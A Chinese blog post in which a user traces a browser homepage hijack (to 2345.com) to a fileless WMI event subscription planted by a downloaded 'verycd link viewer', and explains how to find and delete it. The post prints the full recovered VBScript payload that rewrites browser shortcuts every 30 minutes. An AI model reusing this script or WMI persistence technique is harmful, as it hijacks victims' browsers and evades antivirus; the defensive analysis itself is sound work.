某日,因想下载verycd.com的资源,搜索到一个verycd链接查看器(具体原因不表,你懂),结果就真得吃了苍蝇了!……

既无法查到下载链接,直接将之删除。然而发现,再打开浏览器就被直接跳转到http://www.2345.com/页面了,而且打开多个浏览器:Chrome,Firefox,Opera,Safari,iexplorer,maxthon,均相同症状,检查浏览器首页设置——均正常!

最后发现,原来快速启动栏的快捷命令被其修改,修改后的类似如下:

"C:\ProgramFiles(x86)\MozillaFirefox\firefox.exe"http://www.2345.com/?kunown

于是认为就是普通的修改快捷方式,手工删除“http://www.2345.com/?kunown”部分。但好景不长,半小时后再次被更改了,这才认定——系统被蛀了~!

本机安装有norton,未检出问题。

又安装了超级兔子、360、exterminateit等工具进行检查,也未检出……,果断将其全部卸载……(超级兔子卸载后发现还留有其自带浏览器垃圾未删除!!!真够垃圾~!手工将其卸载,不多赘述!)

打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了……),修改win7下opera快速启动图标路径类似如下:

C:\Users\Gemini\AppData\Roaming\Microsoft\InternetExplorer\QuickLaunch\UserPinned\TaskBar\Opera12.011532.lnk

查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。

要查看WMI事件,到以下地址下载WMITool并安装,

http://www.microsoft.com/en-us/download/details.aspx?id=24045

安装后打开WMIeventviewer,点击左上角registerforevents,弹出Connecttonamespace框,填入“root\subscription”,确定,出现下图:


点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsumerName="unown",选择viewinstantproperties,如下图:


查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中),靠~!

受到影响的浏览器有(各色浏览器,差不多齐了):

"IEXPLORE.EXE","chrome.exe","firefox.exe","360chrome.exe","360SE.exe","SogouExplorer.exe","opera.exe","Safari.exe","Maxthon.exe","TTraveler.exe","TheWorld.exe","baidubrowser.exe","liebao.exe","QQBrowser.exe"

具体代码如下:

On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\Gemini\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If

最后,清除方法:在WMIeventviewer中将“_EventFilter:Name="unown_filter"”项目右键删除!

删不掉?

到WMITool安装路径(例如:C:\ProgramFiles(x86)\WMITools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!

还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!

暂时就这么多了,还有没有其它影响的话,用用再看吧!

嗯,好歹这苍蝇到底还是吐出去了!

浏览器被恶意设置主页http://www.2345.com/?kunown的解决方法相关推荐

  1. IE以及其他浏览器主页被劫持到www.2345.com/?kunown的解决办法

     近日在网上相续看到有网友表示自己在下载使用了VeryCD下载链接查看器这款工具以后,再打开浏览器就被直接跳转到 www.2345.com/?kunown 这个导航页面了,而且打开多个浏览器:IE ...

  2. Edge/IE浏览器主页被篡改为360导航的快捷解决方法

    Edge/IE 浏览器主页被篡改为360导航的快捷解决方法 1.打开自带的电脑管家 找到浏览器保护 打开页面如下 2.同时打开360找到主页防护 打开页面如下,按要求操作 1.打开自带的电脑管家 找到 ...

  3. 阿里云虚拟主机针对恶意频繁攻击式访问造成CPU爆满的解决方法

    阿里云虚拟主机针对恶意频繁攻击式访问造成CPU爆满的解决方法 参考文章: (1)阿里云虚拟主机针对恶意频繁攻击式访问造成CPU爆满的解决方法 (2)https://www.cnblogs.com/xi ...

  4. 计算机管理员解除阻止程序方法,电脑安装软件时弹出系统管理员设置了系统策略,禁止进行此安装解决方法...

    在安装office word的时候,无法安装成功,系统提示系统管理员设置了系统策略,禁止进行此安装.不少网友相信碰到过类似的问题,今天小编就为大家讲解下解决办法,希望对大家有所帮助. 组件服务 1.打 ...

  5. w7计算机防火墙无法更改,win7系统提示防火墙无法更改某些设置错误代码0x8007437的原因及四种解决方法...

    win7系统提示"防火墙无法更改某些设置,错误代码0x8007437",这该怎么办呢?下面脚本之家的小编就带来win7系统提示防火墙无法更改某些设置错误代码0x8007437的原因 ...

  6. Html设置背景图模糊,CSS设置背景图片模糊内容不模糊的解决方法

    需求:一个div设置了background: url,现在需要使图片背景模糊,div内的文字清晰显示. 解决方法:内容和图片分别置于一个div,通过css设置背景div模糊度,设置内容div绝对位置, ...

  7. 电脑耳机没声音怎么设置?(win7/win10电脑耳机没声音的解决方法)

    电脑耳机没声音怎么设置?(win7/win10电脑耳机没声音的解决方法!) 首先,无论是win7还是win10系统的电脑都得安装有声卡和声卡驱动,不然是耳机是没声音的,所以,电脑耳机没声音可以用驱动精 ...

  8. ci框架 乱码 mysql_mysql设置utf8_unicode_ci字符集php页面输出??乱码的解决方法

    mysql设置utf8_unicode_ci字符集php页面输出??乱码的解决方法 作者:吕海鹏 文章来源:itstudy原创 发表时间:2008-10-18 11:15:08 阅读次数:今日:5 本 ...

  9. 【Firefly Ubuntu设置系统为中文失败原因说明及解决方法~】

    Firefly Ubuntu设置系统为中文失败原因说明及解决方法~ 近日在学习 ESP8266 RTOS IDF 开发,使用windows系统编译个 " hello,world" ...

最新文章

  1. Python 自动化运维 pycurl
  2. 通过注册表修改VC6.0的字体【转】
  3. 一步步构建多层架构系列二之设计模式运用篇
  4. Altera FPGA管脚弱上拉电阻详细设置方法
  5. html点击按钮切换图片代码_SVG创意推文—『点击开窗』教程
  6. 【转】TeeChart的用法
  7. java职业发展路线图_软开(Java),该如何规划职业路线?
  8. 8.BLE---错误码
  9. 拓端tecdat:Python集成学习:自己编写构建AdaBoost分类模型可视化决策边界及sklearn包调用比较
  10. 2021-03-14
  11. plsql oracle client没有正确安装(plsql连接远程数据库)
  12. 30个值得推荐的数据可视化工具--转
  13. USB驱动——键盘驱动(控制传输)
  14. 终于解决 归递调用 警告,其实程序没有 归递调用*** WARNING L13: RECURSIVE CALL TO SEGMENT
  15. maven的jar包引入成功却仍然爆红
  16. 排列组合问题之捆绑法和插空法
  17. python——plt.figure()画子图(双轴图)双Y轴实例
  18. [已解决]报异常java.io.InvalidClassException的解决方法|对象序列化实现Serializable会出现java.io.InvalidClassException的异常
  19. Ubuntu18.04下的PCL安装(摸爬滚打)
  20. [洛谷P4707] 重返现世

热门文章

  1. 目标检测任务的标注标准(以火焰和烟雾的数据集标注为例)
  2. html+css取消下划线
  3. 已解决!element-UI 父子组件嵌套使用dilog导致蒙版混乱解决方案!
  4. Android 微光闪烁效果
  5. IIS8.5安装urlrewrite2.0 后C:\Windows\system32\inetsrv\rewrite.dll 不能加载
  6. Carsim2019_官方Help学习笔记_Running a VS FMU in Simulink (Carsim与Matlab联合仿真方法之一)
  7. 云扩科技与百胜数睿签署战略合作协议,加速超自动化平台落地零售行业
  8. django 快速实现文件上传(django2.0)
  9. LAB002 -Oracle数据库手工冷备份(归档模式)
  10. 【操作系统】主存空间的分配和回收